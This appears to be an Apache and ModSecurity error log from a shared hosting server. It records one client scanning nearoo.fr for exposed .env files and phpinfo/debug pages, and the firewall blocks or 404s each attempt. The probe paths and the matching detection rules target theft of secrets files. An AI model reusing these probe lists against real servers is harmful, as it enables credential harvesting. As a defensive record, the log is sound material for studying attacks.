[Mon May 11 17:36:37.428783 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/job/.env"] [unique_id "agH3hfy_GXSWIKeli0sN1wAAAJQ"]
[Mon May 11 17:36:37.584768 2026] [ssl:error] [pid 1416109:tid 1416139] (EAI 2)Name or service not known: [client 213.188.75.75:36929] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:36:37.584801 2026] [ssl:error] [pid 1416109:tid 1416139] AH01941: stapling_renew_response: responder error
[Mon May 11 17:36:37.703382 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/test/.env"] [unique_id "agH3hfy_GXSWIKeli0sN2AAAAJQ"]
[Mon May 11 17:36:37.703614 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/test/.env"] [unique_id "agH3hfy_GXSWIKeli0sN2AAAAJQ"]
[Mon May 11 17:36:37.703842 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/test/.env"] [unique_id "agH3hfy_GXSWIKeli0sN2AAAAJQ"]
[Mon May 11 17:36:37.890416 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/qa/.env"] [unique_id "agH3hfy_GXSWIKeli0sN2QAAAJQ"]
[Mon May 11 17:36:37.890650 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/qa/.env"] [unique_id "agH3hfy_GXSWIKeli0sN2QAAAJQ"]
[Mon May 11 17:36:37.890897 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/qa/.env"] [unique_id "agH3hfy_GXSWIKeli0sN2QAAAJQ"]
[Mon May 11 17:36:38.093356 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /preview/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/preview/.env"] [unique_id "agH3hvy_GXSWIKeli0sN2gAAAJQ"]
[Mon May 11 17:36:38.093589 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/preview/.env"] [unique_id "agH3hvy_GXSWIKeli0sN2gAAAJQ"]
[Mon May 11 17:36:38.093821 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/preview/.env"] [unique_id "agH3hvy_GXSWIKeli0sN2gAAAJQ"]
[Mon May 11 17:36:38.304945 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/beta/.env"] [unique_id "agH3hvy_GXSWIKeli0sN3AAAAJQ"]
[Mon May 11 17:36:38.305185 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/beta/.env"] [unique_id "agH3hvy_GXSWIKeli0sN3AAAAJQ"]
[Mon May 11 17:36:38.305454 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/beta/.env"] [unique_id "agH3hvy_GXSWIKeli0sN3AAAAJQ"]
[Mon May 11 17:36:38.512619 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uat/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/uat/.env"] [unique_id "agH3hvy_GXSWIKeli0sN3QAAAJQ"]
[Mon May 11 17:36:38.512911 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/uat/.env"] [unique_id "agH3hvy_GXSWIKeli0sN3QAAAJQ"]
[Mon May 11 17:36:38.513216 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/uat/.env"] [unique_id "agH3hvy_GXSWIKeli0sN3QAAAJQ"]
[Mon May 11 17:36:38.685554 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/stage/.env"] [unique_id "agH3hvy_GXSWIKeli0sN3wAAAJQ"]
[Mon May 11 17:36:38.685807 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/stage/.env"] [unique_id "agH3hvy_GXSWIKeli0sN3wAAAJQ"]
[Mon May 11 17:36:38.686079 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/stage/.env"] [unique_id "agH3hvy_GXSWIKeli0sN3wAAAJQ"]
[Mon May 11 17:36:38.873681 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/development/.env"] [unique_id "agH3hvy_GXSWIKeli0sN4AAAAJQ"]
[Mon May 11 17:36:38.873905 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/development/.env"] [unique_id "agH3hvy_GXSWIKeli0sN4AAAAJQ"]
[Mon May 11 17:36:38.874180 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/development/.env"] [unique_id "agH3hvy_GXSWIKeli0sN4AAAAJQ"]
[Mon May 11 17:36:39.044840 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/production/.env"] [unique_id "agH3h_y_GXSWIKeli0sN4QAAAJQ"]
[Mon May 11 17:36:39.045085 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/production/.env"] [unique_id "agH3h_y_GXSWIKeli0sN4QAAAJQ"]
[Mon May 11 17:36:39.045353 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/production/.env"] [unique_id "agH3h_y_GXSWIKeli0sN4QAAAJQ"]
[Mon May 11 17:36:39.277724 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/config/app/.env"] [unique_id "agH3h_y_GXSWIKeli0sN4gAAAJQ"]
[Mon May 11 17:36:39.277946 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/config/app/.env"] [unique_id "agH3h_y_GXSWIKeli0sN4gAAAJQ"]
[Mon May 11 17:36:39.278212 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/config/app/.env"] [unique_id "agH3h_y_GXSWIKeli0sN4gAAAJQ"]
[Mon May 11 17:36:39.476040 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/phpinfo.php
[Mon May 11 17:36:39.676492 2026] [ssl:error] [pid 1411201:tid 1411249] (EAI 2)Name or service not known: [client 158.46.209.83:38453] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:36:39.676517 2026] [ssl:error] [pid 1411201:tid 1411249] AH01941: stapling_renew_response: responder error
[Mon May 11 17:36:39.677740 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/info.php
[Mon May 11 17:36:39.875294 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/php.php
[Mon May 11 17:36:40.065909 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/i.php
[Mon May 11 17:36:40.244467 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/pi.php
[Mon May 11 17:36:40.587755 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/pinfo.php
[Mon May 11 17:36:40.760195 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/test.php
[Mon May 11 17:36:40.844670 2026] [ssl:error] [pid 1411099:tid 1411120] (EAI 2)Name or service not known: [client 179.174.208.198:43911] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:36:40.844703 2026] [ssl:error] [pid 1411099:tid 1411120] AH01941: stapling_renew_response: responder error
[Mon May 11 17:36:41.242853 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/p.php
[Mon May 11 17:36:41.429714 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/debug.php
[Mon May 11 17:36:42.038730 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/test/phpinfo.php
[Mon May 11 17:36:43.275811 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/php-info.php
[Mon May 11 17:36:43.462924 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/phpversion.php
[Mon May 11 17:36:43.645245 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/_phpinfo.php
[Mon May 11 17:36:43.942985 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/old_phpinfo.php
[Mon May 11 17:36:44.159069 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/server-info.php
[Mon May 11 17:36:44.385621 2026] [:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] File does not exist: /home/nearoofr/public_html/server-status.php
[Mon May 11 17:37:00.549700 2026] [ssl:error] [pid 1411099:tid 1411112] (EAI 2)Name or service not known: [client 116.202.235.23:43330] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:37:00.549748 2026] [ssl:error] [pid 1411099:tid 1411112] AH01941: stapling_renew_response: responder error
[Mon May 11 17:37:00.603351 2026] [ssl:error] [pid 1411055:tid 1411064] (EAI 2)Name or service not known: [client 116.202.235.23:43342] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:37:00.603388 2026] [ssl:error] [pid 1411055:tid 1411064] AH01941: stapling_renew_response: responder error
[Mon May 11 17:37:00.653260 2026] [ssl:error] [pid 1416109:tid 1416135] (EAI 2)Name or service not known: [client 116.202.235.23:43348] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:37:00.653294 2026] [ssl:error] [pid 1416109:tid 1416135] AH01941: stapling_renew_response: responder error
[Mon May 11 17:37:00.701660 2026] [ssl:error] [pid 1424905:tid 1424916] (EAI 2)Name or service not known: [client 116.202.235.23:43352] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:37:00.701689 2026] [ssl:error] [pid 1424905:tid 1424916] AH01941: stapling_renew_response: responder error
[Mon May 11 17:37:10.885800 2026] [ssl:error] [pid 1411055:tid 1411058] (EAI 2)Name or service not known: [client 136.22.129.5:49346] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:37:10.885848 2026] [ssl:error] [pid 1411055:tid 1411058] AH01941: stapling_renew_response: responder error
[Mon May 11 17:37:33.436496 2026] [authz_core:error] [pid 1411201:tid 1411247] [client 176.120.22.46:55785] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-admin/includes/error_log, referer: http://www.labaujue.com/wp-admin/includes/
[Mon May 11 17:38:00.621163 2026] [proxy:error] [pid 1416109:tid 1416150] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Mon May 11 17:38:00.622001 2026] [proxy_http:error] [pid 1416109:tid 1416150] [client 31.32.194.37:60593] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Mon May 11 17:38:00.731307 2026] [security2:error] [pid 1416109:tid 1416151] [client 31.32.194.37:34414] ModSecurity: Warning. Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "440"] [id "920420"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/vnd.ms-sync.wbxml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agH32FV4kyjgo4bQBUhvYQAAANU"]
[Mon May 11 17:38:00.734643 2026] [security2:error] [pid 1416109:tid 1416151] [client 31.32.194.37:34414] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agH32FV4kyjgo4bQBUhvYQAAANU"]
[Mon May 11 17:38:00.734942 2026] [security2:error] [pid 1416109:tid 1416151] [client 31.32.194.37:34414] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Request content type is not allowed by policy"] [tag "event-correlation"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agH32FV4kyjgo4bQBUhvYQAAANU"]
[Mon May 11 17:38:01.521375 2026] [proxy:error] [pid 1416109:tid 1416151] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Mon May 11 17:38:01.521458 2026] [proxy_http:error] [pid 1416109:tid 1416151] [client 31.32.194.37:34414] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Mon May 11 17:38:45.676959 2026] [:error] [pid 1416109:tid 1416149] [client 74.7.242.30:35986] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/tag/renaud-malinconi/
[Mon May 11 17:38:50.573764 2026] [autoindex:error] [pid 1412074:tid 1412091] [client 88.151.34.35:59754] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 17:38:53.936059 2026] [:error] [pid 1412074:tid 1412091] [client 88.151.34.35:59754] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:38:57.232652 2026] [:error] [pid 1412074:tid 1412091] [client 88.151.34.35:59754] File does not exist: /home/totalcloud/public_html/index.php
